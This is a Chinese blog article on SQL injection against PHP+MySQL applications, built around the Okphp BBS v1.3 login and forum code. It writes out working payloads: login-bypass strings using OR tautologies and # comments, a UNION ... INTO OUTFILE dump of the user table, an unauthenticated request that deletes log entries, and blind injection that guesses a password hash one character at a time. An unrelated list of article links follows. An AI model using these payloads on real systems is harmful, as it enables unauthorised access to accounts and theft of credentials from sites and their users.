php 攻击方法之谈php+mysql注射语句构造


Posted in PHP onOctober 30, 2009

一.前言:

版本信息:Okphp BBS v1.3 开源版

由于PHP和MYSQL本身得原因,PHP+MYSQL的注射要比asp困难,尤其是注射时语句的构造方面更是个难点,本文主要是借对Okphp BBS v1.3一些文件得简单分析,来谈谈php+mysql注射语句构造方式,希望本文对你有点帮助。

声明:文章所有提到的“漏洞”,都没有经过测试,可能根本不存在,其实有没有漏洞并不重要,重要的是分析思路和语句构造。

二.“漏洞”分析:

1.admin/login.php注射导致绕过身份验证漏洞:

代码:

$conn=sql_connect($dbhost, $dbuser, $dbpswd, $dbname); 

$password = md5($password); 

$q = "select id,group_id from $user_table where username='$username' and password='$password'"; 

$res = sql_query($q,$conn); 

$row = sql_fetch_row($res); 

$q = "select id,group_id from $user_table where username='$username' and password='$password'"中


$username 和 $password 没过滤, 很容易就绕过。

对于select * from $user_table where username='$username' and password='$password'这样的语句改造的方法有:

构造1(利用逻辑运算):$username=' OR 'a'='a $password=' OR 'a'='a

相当于sql语句:

select * from $user_table where username='' OR 'a'='a' and password='' OR 'a'='a'

构造2(利用mysql里的注释语句# ,/* 把$password注释掉):$username=admin'#(或admin'/*)

即:

select * from $user_table where username='admin'#' and password='$password'"

相当于:

select * from $user_table where username='admin'

在admin/login.php中$q语句中的$password在查询前进行了md5加密所以不可以用构造1中的语句绕过。这里我们用构造2:

select id,group_id from $user_table where username='admin'#' and password='$password'"

相当于:

select id,group_id from $user_table where username='admin'

只要存在用户名为admin的就成立,如果不知道用户名,只知道对应的id,

我们就可以这样构造:$username=' OR id=1#

相当于:

select id,group_id from $user_table where username='' OR id=1# and password='$password'(#后的被注释掉)

我们接着往下看代码:

if ($row[0]) { 

// If not admin or super moderator 

if ($username != "admin" && !eregi("(^|&)3($|&)",$row[1])) { 

$login = 0; 

} 

else { 

$login = 1; 

} 

} 

// Fail to login--------------- 

if (!$login) { 

write_log("Moderator login","0","password wrong"); 

echo " "; 

exit(); 

} 

// Access ! ------------- 

else { 

session_start();

最后简单通过一个$login来判断,我们只要ie提交直接提交$login=1 就可以绕过了 :)。

2.users/login.php注射导致绕过身份验证漏洞:

代码:

$md5password = md5($password); 

$q = "select id,group_id,email from $user_table where username='$username' and password='$md5password'"; 

$res = sql_query($q,$conn); 

$row = sql_fetch_row($res);

$username没过滤利用同1里注释掉and password='$md5password'";

3.admin\log\list.php存在任意删除日志记录漏洞。(ps:这个好象和php+mysql注射无关,随便提一下)

okphp的后台好象写得很马虎,所有文件都没有判断管理员是否已经登陆,以至于任意访问。我们看list.php的代码:

$arr = array("del_log","log_id","del_id"); 

get_r($arr); 

// 

if ($del_log) { 

省略........ 

if ($log_id) { 

foreach ($log_id as $val) { 

$q = "delete from $log_table where id='$val'"; 

$res = sql_query($q,$conn); 

if ($res) { 

$i++; 

} 

} 

} 

elseif ($del_id) { 

$q = "delete from $log_table where id='$del_id'"; 

$res = sql_query($q,$conn); 

} 

$tpl->setVariable("message","$i log deleted ok!"); 

$tpl->setVariable("action","index.php?action=list_log"); 

}

代码就只简单的用get_r($arr);判断的提交的参数,我们只要提交相应的$del_log,$log_id,$del_id。就回删除成功。

4.多个文件对变量没有过滤导致sql注射漏洞。

okphp的作者好象都不喜欢过滤:)。基本上所有的sql语句中的变量都是“赤裸裸”的。具体那些文件我就不列出来了,请自己看代码,我这里就用\forums\list_threads.php为例子简单谈一下。

看list_threads.php的代码:

$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id'"; 

$res = sql_query($q,$conn); 

$row = sql_fetch_row($res);

变量$forum_id没有过滤,因为mysql不支持子查询,我们可以利用union构造语句进行联合查询(要求MySQL版本在4.00以上)实现跨库操作,我们构造如下:

构造1:利用 SELECT * FROM table INTO OUTFILE '/path/file.txt'(要求mysql有file权限,注意在win系统中要绝对路径,如:c://path//file.txt )。把所查询的内容输入到file.txt,然后我们可以通http://ip/path/file.txt来访问得到查询的结果。上面的我们可以这样构造$forum_id:

$forum_id=' union select * from user_table into outfile '/path/file.txt'

以下:

$q = "select name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num,post_num from $type_table where id='$forum_id' union select * from user_table into outfile '/path/file.txt'";

上面的办法要求比较苛刻,必须得到web的路径(一般可以通过提交错误的变量使mysql报错而得到),而且php的magic_gpc=on选项使注入中不能出现单引号。如果magic_gpc=on我们也可以绕过:

构造2:就象asp跨库查询一样,直接利用union select构造语句,使返回结果不同来猜解,这种方法可以绕过单引号(magic_gpc=on)继续注射,不过在php里这种注射相对困难,根据具体的代码而定。具体的语句构造请参考pinkeyes 的文章《php注入实例》。下面我就结合okphp给个利用“返回结果不同”注射的例子:(见漏洞5)。

5.admin/login.php和users/login.php通过sql语句构造可以猜解得到指定用户密码hash:(其实这个和漏洞1和2是同一个,这里单独拿出来,主要是说明语句构造的方法。)

问题代码同漏洞1。

语句的构造(ps:因为语句本身就是对用户库操作就没必要用union了):

$username=admin' AND LENGTH(password)=6#

sql语句变成:

$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6#' and password='$password'"

相当于:

$q = "select id,group_id from $user_table where username='admin' AND LENGTH(password)=6'"

如果LENGTH(password)=6成立,则正常返回,如果不成立,mysql就会报错。

这样我们就可以猜解用户admin密码hash了。如$username=admin' ord(substring(password,1,1))=57#

可以猜用户的密码第一位的ascii码值............。

PHP 相关文章推荐
php上传文件的增强函数
Jul 21 PHP
PHP IN_ARRAY 函数使用注意事项
Jul 24 PHP
php动态生成函数示例
Mar 21 PHP
php实现把url转换迅雷thunder资源下载地址的方法
Nov 07 PHP
完美解决thinkphp验证码出错无法显示的方法
Dec 09 PHP
codeigniter发送邮件并打印调试信息的方法
Mar 21 PHP
PHP数组去重比较快的实现方式
Jan 19 PHP
浅谈PHP的数据库接口和技术
Dec 09 PHP
yii2利用自带UploadedFile实现上传图片的示例
Feb 16 PHP
PHP+AjaxForm异步带进度条上传文件实例代码
Aug 14 PHP
PHP+Redis 消息队列 实现高并发下注册人数统计的实例
Jan 29 PHP
PHP PDOStatement::setAttribute讲解
Feb 01 PHP
PHP 文件上传源码分析(RFC1867)
Oct 30 #PHP
浅谈PHP 闭包特性在实际应用中的问题
Oct 30 #PHP
php实现jQuery扩展函数
Oct 30 #PHP
PHP 读取和修改大文件的某行内容的代码
Oct 30 #PHP
PHP 批量删除数据的方法分析
Oct 30 #PHP
ThinkPHP php 框架学习笔记
Oct 30 #PHP
php pack与unpack 摸板字符字符含义
Oct 29 #PHP
You might like
聊天室php&mysql(二)
2006/10/09 PHP
PHP4在Windows2000下的安装
2006/10/09 PHP
MYSQL数据库初学者使用指南
2006/11/16 PHP
php微信高级接口群发 多客服
2016/06/23 PHP
PHP面向对象五大原则之里氏替换原则(LSP)详解
2018/04/08 PHP
javascript 随机展示头像实现代码
2011/12/06 Javascript
IE中jquery.form中ajax提交没反应解决方法分享
2012/09/11 Javascript
js的image onload事件使用遇到的问题
2014/07/15 Javascript
js监控IE火狐浏览器关闭、刷新、回退、前进事件
2014/07/23 Javascript
javascript实现五星评价代码(源码下载)
2015/08/11 Javascript
js实现模拟银行卡账号输入显示效果
2015/11/18 Javascript
JavaScript中原型链存在的问题解析
2016/09/25 Javascript
微信小程序  Mustache语法详细介绍
2016/10/27 Javascript
关于JS Lodop打印插件打印Bootstrap样式错乱问题的解决方案
2016/12/23 Javascript
jquery——九宫格大转盘抽奖实例
2017/01/16 Javascript
微信小程序 空白页重定向解决办法
2017/06/27 Javascript
vue使用$emit时,父组件无法监听到子组件的事件实例
2018/02/26 Javascript
AngularJS $http post 传递参数数据的方法
2018/10/09 Javascript
[03:09]DOTA2亚洲邀请赛 LGD战队出场宣传片
2015/02/07 DOTA
Python学习小技巧之列表项的拼接
2017/05/20 Python
Python网络爬虫神器PyQuery的基本使用教程
2018/02/03 Python
pycharm运行和调试不显示结果的解决方法
2018/11/30 Python
python3.7 使用pymssql往sqlserver插入数据的方法
2019/07/08 Python
Python 获取windows桌面路径的5种方法小结
2019/07/15 Python
详解Python可视化神器Yellowbrick使用
2019/11/11 Python
python获取引用对象的个数方式
2019/12/20 Python
详解pyqt5的UI中嵌入matplotlib图形并实时刷新(挖坑和填坑)
2020/08/07 Python
详解HTML5中的拖放事件(Drag 和 drop)
2016/11/14 HTML / CSS
爱普生美国官网:Epson美国
2018/11/05 全球购物
Spotahome意大利:公寓和房间出租
2020/02/21 全球购物
餐厅楼面部长岗位职责范文
2014/02/16 职场文书
观看《周恩来的四个昼夜》思想汇报
2014/09/12 职场文书
十岁生日答谢词
2015/01/05 职场文书
天河观后感
2015/06/11 职场文书
诺贝尔奖获得者名言100句:句句启人心智,值永久收藏
2019/08/09 职场文书
2019中秋节祝福语大全,提前收藏啦
2019/09/10 职场文书